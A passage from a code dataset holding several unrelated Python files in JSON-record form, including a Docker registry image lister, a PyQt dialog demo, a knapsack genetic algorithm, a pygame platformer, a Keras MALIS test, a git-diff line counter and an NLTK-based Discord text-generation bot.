e:\n # print(\"http error {}, {}, {}\".format(e.message, e.code, e.body))\n # sys.exit(1)\n else:\n return res\n else:\n raise HttpRetryLimit(path)\n\n# except requests.exceptions.HTTPError as errh:\n# print(\"Http Error:\",errh)\n# except requests.exceptions.ConnectionError as errc:\n# print(\"Error Connecting:\",errc)\n# except requests.exceptions.Timeout as errt:\n# print(\"Timeout Error:\",errt)\n# except requests.exceptions.RequestException as err:\n# print(\"OOps: Something Else\",err)\n\n#[of]:class Error(Exception)\\:\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n#[cf]\n#[of]:class RateLimited(Error)\\:\nclass RateLimited(Error):\n def __init__(self, res, message):\n self.code = res.status_code\n self.reason = res.reason\n self.message = message\n print(\"http rate limited, {} {}, {}\".format(self.code, self.reason, self.message))\n#[cf]\n#[of]:class ResourceBusy(Error)\\:\nclass ResourceBusy(Error):\n def __init__(self, res, message):\n self.code = res.status_code\n self.reason = res.reason\n self.message = message\n print(\"http busy, {} {}, {}\".format(self.code, self.reason, self.message))\n#[cf]\n#[of]:class HttpRequestError(Error)\\:\nclass HttpRequestError(Error):\n def __init__(self, res, message):\n self.code = res.status_code\n self.reason = res.reason\n self.message = message\n print(\"http error, {} {}, {}\".format(self.code, self.reason, self.message))\n sys.exit(1)\n#[cf]\n#[of]:class HttpRetryLimit(Error)\\:\nclass HttpRetryLimit(Error):\n def __init__(self, message):\n self.message = message\n print(\"http reached retry limit connecting to \" + message)\n sys.exit(1)\n#[cf]\n#[cf]\n#[of]:def http_headers\ndef http_headers():\n return {\n 'Content-Type' : 'application/json',\n 'Accept' : 'application/vnd.docker.distribution.manifest.v2+json'\n }\n#[c] 'Authorization' : http_auth_header(),\n#[cf]\n#[cf]\n#[cf]\n\nif len(sys.argv) != 2:\n print(\"Too few arguments - Must have\", 1, \"argument(s)\")\n print(\"USAGE:\" , sys.argv[0], \"<docker_repo_address>\")\n print(\"EXAMPLE:\" , sys.argv[0], \"10.10.61.17:5000\")\n sys.exit(1)\n\nbase_url = \"http://\" + sys.argv[1]\n\nres = http_get(base_url + \"/v2/_catalog\")\nimage_names = json.loads(res.text)['repositories']\n#[c]sorted(image_names, key = lambda i: i.lower())\nfor image_name in image_names:\n res = http_get(base_url + '/v2/' + image_name + '/tags/list')\n image_tags = json.loads(res.text)['tags']\n # print(image_name + \"\\n\" + to_yaml(image_tags))\n for image_tag in image_tags:\n # print(image_name + \":\" + image_tag)\n res = http_get(base_url + '/v2/' + image_name + '/manifests/' + image_tag)\n body = json.loads(res.text)\n digest = res.headers['Docker-Content-Digest']\n print(image_name + \":\" + image_tag + \" \" + digest)\n\n#[c] print(to_yaml(body))\n\n\n# vim:number:tabstop=2:shiftwidth=2:autoindent:foldmethod=marker:foldlevel=0:foldmarker=#[of],#[cf]\n","sub_path":"image-list.py","file_name":"image-list.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"551579354","text":"#-*- coding:utf-8 -*-\n\nimport sys\nfrom PyQt4 import QtCore, QtGui, uic\n\nclass MyDialog(QtGui.QDialog):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n uic.loadUi(\"res.ui\",self)\n\nclass MyWindow(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.setWindowTitle('PyQt')\n self.resize(300,200)\n gridlayout = QtGui.QGridLayout()\n self.button = QtGui.QPushButton('CreateDialog')\n gridlayout.addWidget(self.button,1 ,1)\n self.setLayout(gridlayout)\n self.connect(self.button, QtCore.SIGNAL('clicked()'),\n self.OnButton)\n\n def OnButton(self):\n dialog = MyDialog()\n r = dialog.exec_()\n if r:\n self.button.setText(dialog.lineEdit.text())\n\napp = QtGui.QApplication(sys.argv)\nmywindow = MyWindow()\nmywindow.show()\napp.exec_()\n","sub_path":"TaoBao/TaoBaoSearchMachine-master/pyqt example/PyQtRes.py","file_name":"PyQtRes.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477296711","text":"import sys\nimport os\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\nimport random\nimport copy\nimport numpy as np\nfrom timeit import default_timer as timer\n\nfrom lib.solution import Solution\nfrom lib.instance import Instance\nfrom lib.item import Item\n\n\nclass Genetic():\n def __init__(self, inst, opts):\n self.inst = inst\n self.opts = opts\n self.sol = Solution()\n\n def run(self):\n start = timer()\n self.__run()\n end = timer()\n\n self.sol.time = end - start\n self.sol.price = self.sol.gen_data[\"max\"][-1]\n self.sol.rel_err = abs(self.sol.price - self.inst.opt_price) / \\\n max(self.inst.opt_price, self.sol.price)\n\n def __run(self):\n self.__init_generation()\n\n for _ in range(self.opts[\"g\"]):\n gen = []\n\n gen.append(self.__find_elite())\n while len(gen) < len(self.prev_gen):\n parents = self.__tournament()\n offsprings = self.__crossover(parents)\n offsprings = self.__mutate(offsprings)\n gen += offsprings\n\n self.prev_gen = gen\n self.__add_sol_data()\n\n def __init_generation(self):\n self.prev_gen = []\n pop_size = (self.opts[\"p\"], self.inst.size)\n confs = np.random.randint(2, size=pop_size).tolist()\n\n for conf in confs:\n fitness = self.__calc_fitness(conf)\n self.prev_gen.append(Individual(conf, fitness))\n \n self.__add_sol_data()\n \n def __tournament(self):\n sample1 = random.sample(self.prev_gen, k=5)\n sample2 = random.sample(self.prev_gen, k=5)\n\n tour1 = self.__find_fittest_two(sample1)\n tour2 = self.__find_fittest_two(sample2)\n \n parents = self.__find_fittest_two(tour1 + tour2)\n\n return parents\n\n def __crossover(self, parents):\n if random.random() > self.opts[\"c\"]:\n return copy.deepcopy(parents)\n \n p1, p2 = sorted(random.sample(list(range(self.inst.size)), k=2))\n p_conf1, p_conf2 = parents[0].conf, parents[1].conf\n\n o_conf1 = p_conf1[:p1] + p_conf2[p1:p2] + p_conf1[p1:]\n o_conf2 = p_conf2[:p2] + p_conf1[p1:p2] + p_conf2[p2:]\n fitness1 = self.__calc_fitness(o_conf1)\n fitness2 = self.__calc_fitness(o_conf2)\n i1 = Individual(o_conf1, fitness1)\n i2 = Individual(o_conf2, fitness2)\n\n return [i1, i2]\n\n def __mutate(self, offsprings):\n for offspring in offsprings:\n if random.random() > self.opts[\"m\"]:\n continue\n rand_idx = random.choice(list(range(self.inst.size)))\n offspring.conf[rand_idx] = int(not offspring.conf[rand_idx])\n offspring.fitness = self.__calc_fitness(offspring.conf)\n \n return offsprings\n\n def __find_fittest_two(self, sample):\n sample = sorted(sample, key=lambda x: x.fitness, reverse=True)\n return [sample[0], sample[1]]\n\n def __find_elite(self):\n return copy.deepcopy(max(self.prev_gen, key=lambda x: x.fitness))\n\n def __calc_fitness(self, conf):\n w_sum = self.inst.calc_weight(conf)\n if w_sum <= self.inst.capacity:\n return self.inst.calc_price(conf)\n else:\n return 0\n \n def __add_sol_data(self):\n mean_f = np.mean(list(map(lambda x: x.fitness, self.prev_gen)))\n max_f = max(self.prev_gen, key=lambda x: x.fitness).fitness\n\n self.sol.gen_data[\"mean\"].append(mean_f)\n self.sol.gen_data[\"max\"].append(max_f)\n\n\nclass Individual():\n def __init__(self, conf, fitness):\n self.conf = conf\n self.fitness = fitness\n","sub_path":"genetic/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"119644490","text":"import pygame, math, sys, random\nfrom pygame.locals import *\nscreen = pygame.display.set_mode((1024, 576))\nclock = pygame.time.Clock()\n\nclass Platform:\n\n\tdef __init__(self, position, image, fall_through = False):\n\t\t#pygame.sprite.Sprite.__init__(self)\n\t\tself.image = pygame.image.load(image)\n\t\timage_rect = self.image.get_rect()\n\t\tself.x = position[0]\n\t\tself.y = position[1]\n\t\tnum = image_rect.width / 30\n\t\tself.rect = Rect(self.x - image_rect.width / 2, self.y, image_rect.width, image_rect.height)\n\t\tboundary_top = Rect(self.rect.left, self.rect.top + num, self.rect.width, num)\n\t\tboundary_bottom = Rect(self.rect.left + num, self.rect.bottom - num, self.rect.width - 2 * num, num)\n\t\tboundary_left = Rect(self.rect.left, self.rect.top + 2 * num, num, self.rect.height - 2 * num)\n\t\tboundary_right = Rect(self.rect.right - num, self.rect.top + 2 * num, num, self.rect.height - 2 * num)\n\t\tself.boundaries = [boundary_top, boundary_bottom, boundary_left, boundary_right]\n\t\tself.fall_through = fall_through \n\n\tdef draw(self):\n\t\tscreen.blit(self.image, self.rect)\n\t\t# colors = [(255,255,0), (255,0,0), (0,255,0), (0,0,255)]\n\t\t# for i in range(len(self.boundaries)):\n\t\t# \tpygame.draw.rect(screen, colors[i], self.boundaries[i], 0) #uncomment to see center \n\n\nclass Map:\n\tMAP_MASTER = {\"Final Destination\": (\"../resources/Backgrounds/BG_SPACE.png\", (Platform((screen.get_width() / 2, screen.get_height() / 2), \"../resources/Platforms/Final_Dest.png\"),)),\n\t\"Battlefield\": (\"../resources/Backgrounds/BG_Dark.png\", (Platform((screen.get_width() / 2, screen.get_height() / 2), \"../resources/Platforms/Battlefield_Bottom.png\"),\n\tPlatform((3 * screen.get_width() / 8, 3 * screen.get_height() / 8), \"../resources/Platforms/Battlefield_Left.png\", fall_through = True), Platform((5 * screen.get_width() / 8, 3 * screen.get_height() / 8), \"../resources/Platforms/Battlefield_Right.png\", fall_through = True),\n\tPlatform((screen.get_width() / 2, 1 * screen.get_height() / 4), \"../resources/Platforms/Battlefield_Top.png\", fall_through = True)))}\n\tdef __init__(self, name, background_image = \"default\"):\n\t\tself.name = name\n\t\tself.platforms = []\n\t\tif background_image == \"default\":\n\t\t\tbackground_image = self.MAP_MASTER[name][0]\n\t\t\tself.platforms.extend(self.MAP_MASTER[name][1])\n\t\tself.background_image = pygame.image.load(background_image)\n\t\t\n\tdef draw(self):\n\t\tpygame.display.set_caption(self.name)\n\t\tscreen.blit(self.background_image, (0,0))\n\t\tfor plat in self.platforms:\n\t\t\tplat.draw()\n\t\t#self.screen\n\nclass Ball:\n\tACCELERATION = 0.5\n\tmax_forward_speed = 7.8\n\tMAX_X_SPEED = 5\n\n\tdef __init__(self, position, platforms = []):\n\t\t#pygame.sprite.Sprite.__init__(self)\n\t\tself.position = position\n\t\tself.speed = 0\n\t\tself.k_up = self.k_down = 0\n\t\tself.platforms = platforms\n\t\tself.radius = 4\n\t\tself.touching_platform = False\n\t\tself.velx = 0\n\t\tself.jump_ctr = 2\n\t\tself.rect = self.get_rect()\n\t\tself.fast_falling = False\n\t\tself.accx = 0\n\n\tdef draw(self):\n\t\tpygame.draw.circle(screen, (255, 0, 0), (int(self.position[0]), int(self.position[1])), self.radius, 0)\n\t\t#pygame.draw.rect(screen, (255,255,255), self.bottom_box, 0)\n\n\tdef add_platforms(self, platforms):\n\t\tself.platforms.extend(platforms)\n\n\tdef get_rect(self):\n\t\treturn Rect(self.position, (self.radius, self.radius))\n\n\tdef jump(self):\n\t\tx, y = self.position\n\t\tif self.jump_ctr == 2:\n\t\t\t#self.move(x, y - 30)\n\t\t\tself.speed = -10\n\t\t\tself.jump_ctr -= 1\n\t\telif self.jump_ctr == 1:\n\t\t\tself.speed = -8\n\t\t\tself.jump_ctr -= 1\n\n\n\tdef move(self, x, y):\n\t\tself.position = (x, y)\n\t\tself.rect = self.get_rect()\n\n\tdef update(self, deltat):\n\t\tx, y = self.position\n\t\tself.velx *= 0.8\n\t\tself.velx += self.accx\n\n\t\tx += self.velx\n\t\ty += self.speed\n\t\t#self.acccx = 0\n\t\tif self.velx > abs(self.MAX_X_SPEED) and self.velx < 0:\n\t\t\tself.velx = -self.MAX_X_SPEED\n\t\telif self.velx > abs(self.MAX_X_SPEED) and self.velx > 0:\n\t\t\tself.velx = self.MAX_X_SPEED\n\t\tself.move(x, y)\n\t\tif not self.touching_platform and self.fast_falling:\n\t\t\tself.speed += self.ACCELERATION * 2\n\t\telif not self.touching_platform:\n\t\t\tself.speed += self.ACCELERATION\n\t\tif self.speed > self.max_forward_speed:\n\t\t\tself.speed = self.max_forward_speed\n\t\tself.max_forward_speed = 7.8\n\t\t#self.move(x, y)\n\n\t\t# if len(pygame.sprite.spritecollide(self, self.platforms, False)) > 0:\n\t\t# print(self.rect.left, self.rect.top)\n\t\t# print(self.platforms[0].boundary_rect.left, self.platforms[0].boundary_rect.top)\n\t\t\n\t\tif y >= 570:\n\t\t\tself.move(screen.get_width() / 2, 0)\n\t\t\tself.speed = 0\n\t\t\tself.velx = 0\n\n\n\n\t\tfor platform in self.platforms:\n\t\t\tboundary_rect = platform.boundaries[0]\n\t\t\tif self.rect.colliderect(boundary_rect) and self.speed >= 0 and (not self.fast_falling or not platform.fall_through): #and not platform.fall_through: \n\t\t\t\t#if self.rect.bottom > boundary_rect.top and self.rect.bottom - boundary_rect.top > 0:\n\t\t\t\t#print(2)\n\t\t\t\tself.touching_platform = True\n\t\t\t\tself.speed = 0 \n\t\t\t\tself.move(x, boundary_rect.top - self.radius)\t\t\n\t\t\t\tself.jump_ctr = 2\t\n\t\t\t\t# self.speed *= -1\n\t\t\t\t#self.velx = 0\n\t\t\tif not self.rect.colliderect(boundary_rect) and not platform.fall_through:\n\t\t\t\tif self.rect.colliderect(platform.boundaries[1]):\n\t\t\t\t\tself.speed = 0 \n\t\t\t\t\tself.move(x, platform.boundaries[1].bottom + self.radius )\t\t\n\t\t\t\t\t#self.velx = 0\n\t\t\t\t\tself.touching_platform = False\n\t\t\t\telif self.rect.colliderect(platform.boundaries[2]):\n\t\t\t\t\t#self.speed = 0 \n\t\t\t\t\tself.move(platform.boundaries[2].left - self.radius, y)\t\t\n\t\t\t\t\tself.velx = 0\n\t\t\t\t\tself.touching_platform = False\n\t\t\t\telif self.rect.colliderect(platform.boundaries[3]):\n\t\t\t\t\t#self.speed = 0 \n\t\t\t\t\tself.move(platform.boundaries[3].right + self.radius, y)\t\t\n\t\t\t\t\tself.velx = 0\n\t\t\t\t\tself.touching_platform = False\n\t\t\t\telse:\n\t\t\t\t\tself.touching_platform = False\n\t\t\telse:\n\t\t\t\tself.touching_platform = False\n\n\n#460 x 171\n\nplat_image1 = \"../resources/Platforms/Battlefield_Top.png\"\nimage1= \"../resources/Backgrounds/CastleBG.jpg\"\nmap1 = Map(\"Battlefield\")\n#map1 = Map(\"Final Destination\")\n#pygame.sprite.spritecollide(, surface_group, False)\nball = Ball((screen.get_width() / 2, 100), map1.platforms)\n\nwhile 1:\n\tdeltat = clock.tick(30)\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tsys.exit(0)\n\t\tif not hasattr(event, 'key'): continue\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_UP and ball.jump_ctr == 1:\n\t\t\t\tball.jump()\n\t\t\tif event.key == K_UP and ball.jump_ctr == 2:\n\t\t\t\tball.jump()\n\t\tif event.key == K_ESCAPE:\n\t\t\tsys.exit(0)\n\n\tif ball.speed == 0:\n\t\tif pygame.key.get_pressed()[pygame.K_LEFT]:\n\t\t\tball.accx = -2\n\n\t\tif pygame.key.get_pressed()[pygame.K_RIGHT]:\n\t\t\tball.accx = 2\n\n\t\tif not(pygame.key.get_pressed()[pygame.K_RIGHT] or pygame.key.get_pressed()[pygame.K_LEFT]):\n\t\t\tball.accx = 0\n\n\tif pygame.key.get_pressed()[pygame.K_DOWN]:\n\t\tball.fast_falling = True\n\t\tball.max_forward_speed *= 2\n\telse:\n\t\tball.fast_falling = False\n\tpygame.display.update()\n\tmap1.draw()\n\tball.update(deltat)\n\tball.draw()\n\n\n\t#pygame.draw.rect(screen, (0,255,0), ((screen.get_width() / 2, screen.get_height() / 2, 4, 4)), 0) #uncomment to see center \n\n\n","sub_path":"source/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"346459873","text":"from __future__ import print_function\nimport theano\nimport theano.tensor as T\nimport numpy as np\nfrom malis.theano_op import keras_malis, malis_metrics_no_theano\nimport pdb\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten, Reshape\nfrom keras.layers.convolutional import Convolution3D, MaxPooling2D\nfrom keras.optimizers import SGD\nna = np.newaxis\n\nN_SAMPLES = 6\nEDG_PER_VOX = 3\nVOLUME_SHAPE = (1,5,6,7)\nEDGEVOL_SHAPE = (EDG_PER_VOX,) + VOLUME_SHAPE[1:]\nDATA_SHAPE = (N_SAMPLES,) + VOLUME_SHAPE\n\n# create some test data\n# two objects\ngt = np.zeros(DATA_SHAPE, dtype=np.int32)\n# first sample\ngt[0, 0, :3, ...] = 1\ngt[0, 0, 3:, ...] = 2\n# second sample\ngt[1, 0, :, :3, ...] = 1\ngt[1, 0, :, 3:, ...] = 2\n# third sample\ngt[2, 0, :, :2, ...] = 1\ngt[2, 0, :, 2:, ...] = 2\ngt[3:] = 3\n\n# create data from gt\ndata=np.zeros(DATA_SHAPE)\n# first sample\ndata[0, 0, :3, ...] = 1\ndata[0, 0, 3, ...] = 0\ndata[0, 0, 4:, ...] = 1\n# second sample\ndata[1, 0, :, :3, ...] = 1\ndata[1, 0, :, 3, ...] = 0\ndata[1, 0, :, 4:, ...] = 1\n# third sample\ndata[2, 0, :, :2, ...] = 1\ndata[2, 0, :, 2, ...] = 0\ndata[2, 0, :, 3:, ...] = 1\ndata[3:] = 1\n\n\n# add some noise\ndata += np.random.normal(loc=0, scale=.01, size=DATA_SHAPE)\n\n# start building classifier\neta = 0.1 #learning rate\nn_epochs = 20\niterations_per_epoch = 100\nkeras_malis_loss = keras_malis(VOLUME_SHAPE[1:])\n\n# start network creation\nmodel = Sequential()\nmodel.add(Convolution3D(nb_filter=5,\n kernel_dim1=3,\n kernel_dim2=3,\n kernel_dim3=3,\n input_shape=VOLUME_SHAPE,\n border_mode=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(Convolution3D(nb_filter=5,\n kernel_dim1=3,\n kernel_dim2=3,\n kernel_dim3=3,\n input_shape=VOLUME_SHAPE,\n border_mode=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(Convolution3D(nb_filter=3,\n kernel_dim1=3,\n kernel_dim2=3,\n kernel_dim3=3,\n input_shape=VOLUME_SHAPE,\n border_mode=\"same\"))\nmodel.add(Activation(\"sigmoid\"))\nsgd = SGD(lr=eta, momentum=0.4, nesterov=True)\nmodel.compile(optimizer=\"SGD\",\n loss=keras_malis_loss)\nloss_history = np.empty((n_epochs))\nfor epoch in range(n_epochs):\n for i in range(iterations_per_epoch):\n # train\n training_hist = model.fit(data,\n gt,\n batch_size=1,\n nb_epoch=1,\n verbose=0)\n # evaluate\n pred = model.predict(data)\n returndict = malis_metrics_no_theano(N_SAMPLES, VOLUME_SHAPE[1:], pred, gt)\n print(returndict[\"malis_cost\"])\n loss_history[epoch] = returndict[\"malis_cost\"]\n\nplt.figure()\nplt.plot(loss_history)\nplt.xlabel(\"epochs\")\nplt.ylabel(\"training loss\")\n\n\n\n# predict an affinity graph and compare it with the affinity graph\n# created by the true segmentation\nplot_sample = 1\nfrom malis import mknhood3d, seg_to_affgraph\npred_aff = model.predict(data)[plot_sample]\naff = seg_to_affgraph(gt[plot_sample,0], mknhood3d())\nplt.figure()\nplt.subplot(131)\nplt.pcolor(data[plot_sample,0,1], cmap=\"gray\")\nplt.title(\"data\")\nplt.subplot(132)\nplt.pcolor(aff[1,1], cmap=\"gray\")\nplt.title(\"aff from gt\")\nplt.subplot(133)\nplt.pcolor(pred_aff[1,1], cmap=\"gray\")\nplt.title(\"predicted aff\")\nplt.show()\n","sub_path":"tests/test_keras_3d.py","file_name":"test_keras_3d.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"382973287","text":"from pydriller import RepositoryMining\n\nimport argparse\nimport os\nimport datetime\nimport json\n\n\ndef should_ignore(line):\n return line.startswith('@@') or \\\n line.startswith('##') or \\\n '#?#' in line or \\\n '#@#' in line\n\n\ndef parse_by_date(repo, bgn, end):\n lines = []\n\n miner = RepositoryMining(repo, since=bgn, to=end)\n for commit in miner.traverse_commits():\n for modification in commit.modifications:\n added = modification.diff_parsed['added']\n for item in added:\n line = item[1]\n if should_ignore(line):\n continue\n lines.append(line)\n\n return lines\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--repo')\n parser.add_argument('--output')\n parser.add_argument('--month')\n parser.add_argument('--period')\n\n args = parser.parse_args()\n if not args.repo or not args.output or not args.month or not args.period:\n parser.print_help()\n return\n\n month = int(args.month)\n period = int(args.period)\n\n ranges = []\n bgn = 1\n while bgn < period:\n end = min(bgn + 6, period)\n ranges.append([bgn, end])\n bgn += 7\n\n report = {}\n index = 1\n for range in ranges:\n bgn = range[0]\n end = range[1]\n begin = datetime.datetime(2020, month, bgn, 0, 0)\n end = datetime.datetime(2020, month, end, 23, 59)\n print(f'Process the {index}th week...')\n lines = parse_by_date(args.repo, begin, end)\n\n path = os.path.join(args.output, f'{index}th.txt')\n with open(path, 'w') as hdle:\n for line in lines:\n out_line = f'{line}\\n'\n hdle.write(out_line)\n\n report[index] = len(lines)\n index += 1\n\n path = os.path.join(args.output, 'report.json')\n with open(path, 'w') as hdle:\n json.dump(report, hdle)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"rule_analyzer.py","file_name":"rule_analyzer.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"70136592","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/8 16:39\n# @Author : YuChou\n# @Site : \n# @File : testone.py\n# @Software: PyCharm\n\nimport multiprocessing\nimport time\nimport threading\n\n\nclass Demo:\n def __init__(self, thread_num=5):\n self.thread_num = thread_num\n\n def productor(self, i):\n print(\"thread-%d start\" % i)\n\n def start(self,num):\n global y\n y =100\n threads = []\n for x in range(num):\n t = threading.Thread(target=self.productor, args=(x,))\n threads.append(t)\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n print('all thread end')\n d\n\n\nif __name__ == \"__mian__\":\n demo = Demo()","sub_path":"PishOTA/testone.py","file_name":"testone.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"347447246","text":"# -*- coding: utf-8 -*-\n\nimport socket\n\nif __name__ == '__main__':\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n\twhile True:\n\t\tsbuf = input('send:')\n\t\tif sbuf == 'exit':\n\t\t\tbreak\n\t\ts.sendto(sbuf.encode('utf-8'),('127.0.1.1', 9876))\n\t\tprint(s.recv(1024).decode('utf-8'))\n","sub_path":"udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103184316","text":"from datetime import datetime\n\ndef wypisanie_historii():\n print('Uruchomienia do tej pory:')\n try:\n plik_do_odczytu = open('uruchomienia.log', mode='r')\n except FileNotFoundError:\n print('Brak historii uruchomień')\n else:\n zawartosc = plik_do_odczytu.read()\n print(zawartosc)\n\ndef zapisanie_uruchomienia():\n plik_do_zapisu = open('uruchomienia.log', mode='a')\n teraz = datetime.now()\n tekst = f'Skrypt został uruchomiony: {teraz}\\n'\n\n print('Aktualne uruchomienie:')\n print(tekst)\n plik_do_zapisu.write(tekst)\n\nif __name__ == '__main__':\n wypisanie_historii()\n zapisanie_uruchomienia()\n","sub_path":"zajecia12/zadanie01b.py","file_name":"zadanie01b.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"126972371","text":"import numpy as np\r\n\r\n\r\nclass ColorFinder:\r\n def __init__(self, sum_num):\r\n\r\n # constants\r\n self.c, self.dielectric_c = 3*1e8, 8.854*1e-12\r\n\r\n # wave length & rgb_color_matching\r\n self.length, xyz = [], []\r\n t = np.array([[0.41847, -0.15866, -0.082835], [-0.091169, 0.25243, 0.015708], [0.0009209, -0.0025498, 0.17860]]) # xyz to rgb\r\n\r\n with open('lin2012xyz10e_fine_7sf.csv', 'r') as f:\r\n while True:\r\n try:\r\n l, x, y, z = map(float, f.readline().split(','))\r\n self.length.append(l)\r\n xyz.append([x,y,z])\r\n except ValueError:\r\n break\r\n\r\n xyz = xyz[0:4401 - sum_num]\r\n self.xyz = np.array(xyz)\r\n\r\n self.color_matching = np.dot(t, self.xyz.T).T # wavelength X rgb(4401X3)\r\n\r\n def RGB(self, power):\r\n\r\n return np.dot(power, self.color_matching)\r\n\r\n def rgb(self, power):\r\n rgb_info = self.RGB(np.real(power))\r\n\r\n if rgb_info[0] < 0 or rgb_info[1] < 0 or rgb_info[2] < 0:\r\n print(\"it can't be showed by rgb matching function\")\r\n\r\n r, g, b = np.abs(rgb_info) # if there is negative value it means it can't be showed by rgb matching function\r\n denominator = r + g + b\r\n tmp1, tmp2, tmp3 = np.dot(np.real(power), self.xyz)\r\n tmp_sum = tmp1 + tmp2 + tmp3\r\n print(tmp1/tmp_sum, tmp2/tmp_sum, tmp3/tmp_sum)\r\n\r\n\r\n return [r/denominator, g/denominator, b/denominator], tmp1/tmp_sum, tmp2/tmp_sum\r\n\r\n\r\nif __name__ == '__main__':\r\n import matplotlib.pyplot as plt\r\n\r\n test_wavelength = [i / 10 for i in range(3900, 8301)]\r\n test_ans = ColorFinder().color_matching.T\r\n\r\n plt.title('RGB_converter')\r\n plt.plot(test_wavelength, test_ans[0], label='r_graph', color='r')\r\n plt.plot(test_wavelength, test_ans[1], label='g_graph', color='g')\r\n plt.plot(test_wavelength, test_ans[2], label='b_graph', color='b')\r\n plt.xlabel('wave_length')\r\n plt.legend(loc='best')\r\n plt.show()","sub_path":"graph_to_color.py","file_name":"graph_to_color.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212983638","text":"import discord\nimport os\nfrom nltk.util import everygrams\nfrom nltk.lm.preprocessing import pad_both_ends\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.lm.preprocessing import padded_everygram_pipeline\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nfrom nltk.lm import MLE\nfrom keep_alive import keep_alive\n\nimport re\nimport random\n\nclient = discord.Client()\n#cleaning\nttalk_fp = os.path.join('ttalk.txt')\nttalk = open(ttalk_fp, encoding='utf-8').read()\nttalk = re.sub(r'\\n', ' ', ttalk)\nttalk = re.sub(r'<[\\#\\@][!0-9]+>', ' ', ttalk)\nttalk = re.sub(r'<\\w*:[A-Za-z0-9\\_]+:\\d+>', ' ', ttalk)\ntokenized = [list(map(str.lower, word_tokenize(word))) for word in sent_tokenize(ttalk)]\n#model training, trigrams\ntrain, padded = padded_everygram_pipeline(3, tokenized)\nmodel = MLE(3)\nmodel.fit(train, padded)\n\n\n#word generation\ndef generate_random_sentence(model, n_words):\n detokenize = TreebankWordDetokenizer().detokenize\n sentence = []\n for word in model.generate(n_words, random_seed = random.randint(-1000000, 1000000)):\n if word == '<s>':\n continue\n if word =='</s>':\n break\n sentence.append(word)\n \n return detokenize(sentence)\n\n#finishing a sentence\ndef finish_sentence(model, n_words, start):\n detokenize = TreebankWordDetokenizer().detokenize\n sentence = []\n sentence.append(start)\n for word in model.generate(n_words, text_seed = start.split(), random_seed = random.randint(-1000000, 1000000)):\n if word == '<s>':\n continue\n if word =='</s>':\n break\n sentence.append(word)\n \n return detokenize(sentence)\n\n\n@client.event\nasync def on_ready():\n print(\"I'm in\")\n print(client.user)\n\n@client.event\nasync def on_message(message):\n channel_id = '%%' + str(message.channel.id)\n \n random_length = random.randint(5, 30)\n if message.content.startswith('ac!generate %%'):\n if message.author != client.user:\n generate = generate_random_sentence(model, random_length)\n combine = re.findall(r'%%[0-9]+', message.content)[0] + ' ' + generate\n await message.channel.send(combine)\n\n if message.content.startswith('ac!generate'):\n if '%%' not in message.content: \n if message.author != client.user:\n generate = generate_random_sentence(model, random_length)\n combine = generate\n await message.channel.send(combine)\n \n #bot talking\n if message.content.startswith('ac!complete %%'):\n \n removed_id = re.sub(r'%%[0-9]+', '',message.content)\n \n to_complete = removed_id[13:]\n stripped = to_complete.strip('\"')\n \n sav_id = re.findall(r'%%[0-9]+', message.content)[0]\n if len(stripped) == 0:\n if message.author != client.user:\n error = '!!error give me something to complete .-.'\n combine = sav_id + ' ' + error\n await message.channel.send(combine)\n elif message.author != client.user:\n generate = finish_sentence(model, random_length, stripped)\n combine = sav_id + ' ' + generate\n await message.channel.send(combine)\n\n if message.content.startswith('ac!complete \"'):\n to_complete = message.content[13:]\n stripped = to_complete.strip('\"')\n if '%%' not in message.content: \n if message.author != client.user:\n generate = finish_sentence(model, random_length, stripped)\n combine = generate\n await message.channel.send(combine)\n \n if message.content.startswith('ac!complete'):\n if '%%' not in message.content: \n if len(message.content) < 12:\n if message.author != client.user:\n error = '!!error give me something to complete .-.'\n combine = error\n await message.channel.send(combine)\n elif message.content[12] != '\"':\n if message.author != client.user:\n error = '!!error add quotation marks around your text silly'\n combine = error\n await message.channel.send(combine)\n \n \nkeep_alive\ntoken = 